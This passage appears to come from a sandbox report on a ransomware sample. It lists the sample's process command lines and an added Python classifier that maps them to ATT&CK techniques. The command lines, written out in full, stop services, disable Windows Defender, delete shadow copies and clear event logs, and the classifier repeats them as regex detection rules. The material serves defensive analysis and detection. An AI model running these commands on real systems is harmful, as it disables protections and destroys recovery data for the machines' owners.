| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Image | Command line |
| C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | "C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe" |
| C:\Windows\SysWOW64\net.exe | net.exe stop "NetMsmqActivator" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "VSS" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "NetMsmqActivator" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\SysWOW64\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\SysWOW64\Wbem\wmic.exe | wmic.exe shadowcopy delete |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
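The command lines above are the sample's pre-encryption staging: stop eight services and set them to disabled, switch off every Defender component through policy keys, service Start values, scheduled tasks, MpCmdRun and Set-MpPreference, silence the Defender ETW autologgers, delete shadow copies through both vssadmin and wmic, and clear the System, Security and Application logs. The classifier below is an added example, not part of the sandbox report, that runs over process command lines of this shape (for instance the CommandLine field of Sysmon event 1 or Security event 4688) and maps each to an ATT&CK technique. The technique IDs are this example's own mapping; the report carries none. The sample input is copied from the Processes list above, with three constructed benign commands appended to show that queries and service starts do not match.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# (case-insensitive regex over the command line, ATT&CK technique ID, technique name, label).
# The first matching rule wins. The IDs are this example's mapping of the commands in the
# Processes list above; the sandbox report itself carries no technique IDs.
RULES = [
    (r'\bnet1?(?:\.exe)?\s+stop\b',                        "T1489",     "Service Stop",             "net stop"),
    (r'\bsc(?:\.exe)?\s+config\b.*\bstart=\s*disabled\b',  "T1489",     "Service Stop",             "service disabled at boot"),
    (r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b',         "T1490",     "Inhibit System Recovery",  "vssadmin shadow deletion"),
    (r'\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b',          "T1490",     "Inhibit System Recovery",  "wmic shadow deletion"),
    (r'\bwevtutil(?:\.exe)?\s+cl\s+\w+',                   "T1070.001", "Clear Windows Event Logs", "wevtutil cl"),
    (r'Autologger\\Defender\w+Logger',                     "T1562.006", "Indicator Blocking",       "Defender ETW autologger off"),
    (r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions',         "T1562.001", "Disable or Modify Tools",  "Defender definitions removed"),
    (r'Set-MpPreference\s+-Disable\w+\s+\$true',           "T1562.001", "Disable or Modify Tools",  "Set-MpPreference -Disable*"),
    (r'\bschtasks(?:\.exe)?\s+/Change\b.*(?:Windows Defender|ExploitGuard).*/Disable\b',
                                                           "T1562.001", "Disable or Modify Tools",  "Defender scheduled task disabled"),
    (r'Services\\(?:WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)\b.*\s/d\s+"?4"?',
                                                           "T1562.001", "Disable or Modify Tools",  "Defender service Start=4"),
    (r'\breg(?:\.exe)?\s+add\b.*Windows Defender',         "T1562.001", "Disable or Modify Tools",  "Defender policy key set"),
    (r'\breg(?:\.exe)?\s+delete\b.*(?:Windows Defender|\\EPP\b)',
                                                           "T1562.001", "Disable or Modify Tools",  "Defender key or shell handler removed"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), tid, name, label) for p, tid, name, label in RULES]


@dataclass(frozen=True)
class Finding:
    cmdline: str
    technique_id: str
    technique: str
    label: str


def classify(cmdline: str) -> Optional[Finding]:
    """Return the first rule that matches a command line, or None."""
    for pattern, tid, name, label in COMPILED:
        if pattern.search(cmdline):
            return Finding(cmdline, tid, name, label)
    return None


def summarize(cmdlines: Iterable[str]) -> Tuple[List[Finding], Counter, List[str]]:
    """Classify every command line; return findings, a per-technique count of matching
    process-creation events, and the lines no rule covered."""
    cmdlines = list(cmdlines)
    findings = [f for f in map(classify, cmdlines) if f is not None]
    unmatched = [c for c in cmdlines if classify(c) is None]
    return findings, Counter(f.technique_id for f in findings), unmatched


def verdict(by_technique: Counter) -> str:
    """Each command alone has administrative uses; defenses off (T1562.*) plus backups
    gone (T1490) plus logs wiped (T1070.*) from one process tree is the ransomware pattern."""
    def has(prefix: str) -> bool:
        return any(t.startswith(prefix) for t in by_technique)
    if has("T1562") and has("T1490") and has("T1070"):
        return "likely-ransomware-staging"
    return "suspicious" if by_technique else "no-finding"


# Sample input: fifteen command lines copied from the Processes list above, then three
# constructed benign commands (query, query, service start) that must not match.
SAMPLE_CMDLINES = [
    r'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "SamSs" /y',
    r'sc.exe config "VSS" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe SHADOWCOPY /nointeractive',
    r'wmic.exe shadowcopy delete',
    r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'sc.exe query WinDefend',          # constructed benign line
    r'wevtutil.exe qe System /c:5',     # constructed benign line
    r'net.exe start "VSS"',             # constructed benign line
]

if __name__ == "__main__":
    findings, by_technique, unmatched = summarize(SAMPLE_CMDLINES)
    for f in findings:
        print(f"{f.technique_id:<10} {f.label:<38} {f.cmdline}")
    print("per technique:", dict(by_technique))
    print("unmatched:", unmatched)
    print("verdict:", verdict(by_technique))
```

Counts are process-creation events, so a `cmd.exe /c ...` wrapper and the child it launches each count once, as they do in the Processes list. The `wmic.exe SHADOWCOPY /nointeractive` line stays unmatched on purpose: it only enters the wmic shell, and the deletion is the separate `shadowcopy delete` line. The verdict requires all three tactics because a backup job legitimately stops VSS, an administrator legitimately clears a log, and a Defender policy key is legitimately set by GPO; it is the combination inside one short-lived process tree that is specific to this behaviour.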
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4e230dd18980fbe3b34c4d3ef2f33f8a |
| SHA1 | d8236222ce1f417c445c17624e4cffce0abd4137 |
| SHA256 | 109c8a822a3b6d7b6f1010adf0b88c1b38006b1b3e21e689ace3455ccfe1b294 |
| SHA512 | 12ebbec1e065c6a0fa92b2b32b8a9b849cb09a473676247b6b2ce3cf3c0bb334901569d783ff237400d178b7e97160f2be8e6bb64693bb49d88289330972a8a2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 11:04
Reported
2022-01-13 11:09
Platform
win10-en-20211208
Max time kernel
61s
Max time network
156s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Ws6CBxLTbs40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_K2JruS0H3fQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8wKWajy-rrA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_pNHacr3Xsbc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MlYmERBRnyk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eBD8aEEB7Mo0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PGeNiQcssP80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_yk7D3S0XPoY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_INqwEbPi3pc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_plkOpLyaTAg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SPDDfPCob7I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PNuCQJ0fyls0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4JdhLJLnDCU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MOwtg_uMcDs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kUnBnXJpnbY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xX2PQ3br4KM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SMl1u7JMklw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_nSCftRHmmnc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART12.BDR.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cAPihrHLzl40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_r0TT6LtOwNw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RiSPKIEzKYU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kXpOdpzuI7I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_mEizp4cMadE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
